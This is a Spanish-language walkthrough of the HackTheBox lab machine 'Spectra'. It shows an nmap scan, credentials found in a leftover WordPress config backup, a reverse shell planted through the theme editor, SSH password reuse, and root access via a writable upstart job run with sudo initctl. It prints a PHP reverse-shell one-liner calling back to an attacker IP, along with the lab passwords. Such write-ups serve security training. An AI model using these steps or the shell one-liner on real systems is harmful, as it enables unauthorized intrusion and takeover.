# Spectra

**OS**: Other \
**Dificultad**: Fácil \
**Puntos**: 20

## Resumen
- Directory listening
- Wordpress reverse shell
- Initctl priv esc

## Nmap Scan

`nmap -v -p- -sV -sC -oN nmap.txt 10.10.10.229`

```
Nmap scan report for 10.10.10.229
Host is up (0.091s latency).
Scanned at 2021-03-01 11:06:20 CST for 2080s
Not shown: 65531 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.1 (protocol 2.0)
| ssh-hostkey: 
|_  4096 52:47:de:5c:37:4f:29:0e:8e:1d:88:6e:f9:23:4d:5a (RSA)
80/tcp   open  http       nginx 1.17.4
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.17.4
|_http-title: Site doesn't have a title (text/html).
3306/tcp open  mysql      MySQL (unauthorized)

```

## Enumeración

Podemos identificar un nombre de dominio en el puerto 80, lo agregamos a nuestro archivo hosts.

##### /etc/hosts
```
10.10.10.229    spectra.htb
```

Al acceder a **/testing** vemos varios archivos relacionados con WordPress.

![1](img/1.png)

En los archivos el más interesante es **wp-config.php.save**, ya que contiene credenciales.

![2](img/2.png)

```
devtest : devteam01
```

Dentro de la página principal encontramos el nombre de usuario **administrator**.

![3](img/3.png)

Utilizando el password que obtuvimos anteriormente podemos iniciar sesión en **/main/wp-login.php**.

```
administrator : devteam01
```

![4](img/4.png)

Dentro del panel de administración podemos obtener una reverse shell modificando un archivo PHP.

`http://spectra.htb/main/wp-admin/theme-editor.php?file=404.php&theme=twentyseventeen`

![5](img/5.png)

Después de modificar el archivo lo consultamos desde el navegador para obtener nuestra shell.

`http://spectra.htb/main/wp-content/themes/twentyseventeen/404.php`

![6](img/6.png)

## Escalada de Privilegios (User)

En el directorio **/opt** encontramos un archivo llamado **autologin.conf.orig**, el cual está leyendo una lista de passwords.

`cat /opt/autologin.conf.orig`

![7](img/7.png)

Leyendo el archivo del cual extrae los passwords nos muestra lo siguiente:

`cat /etc/autologin/passwd`

![8](img/8.png)

El password lo podemos utilizar para conectarnos por SSH con el usuario **katie**.

```
katie : SummerHereWeCome!!
```

`ssh katie@10.10.10.229`

![9](img/9.png)

## Escalada de Privilegios (Root)

Podemos observar que pertenecemos al grupo **developers**, también es posible ejecutar el comando **/sbin/initctl** como sudo y si revisamos los archivos dentro de **/etc/init** encontramos varios con nombre **test** en los cuales nos es permitido escribir.

- `id`
- `sudo -l`
- `ls -la /etc/init | grep test`

![10](img/10.png)

Ya que sabemos que es posible modificar cualquiera de los archivos test, escribiremos una reverse shell en **test.conf**.

- `nano /etc/init/test.conf`
- `php -r '$sock=fsockopen("10.10.14.13",4444);system("/bin/sh -i <&3 >&3 2>&3");'`
- `cat /etc/init/test.conf`

![11](img/11.png)

Una vez con nuestra shell en el archivo procedemos a ejecutar el siguiente comando:

`sudo /sbin/initctl start test`

![12](img/12.png)

## Referencias
https://www.hackingarticles.in/wordpress-reverse-shell/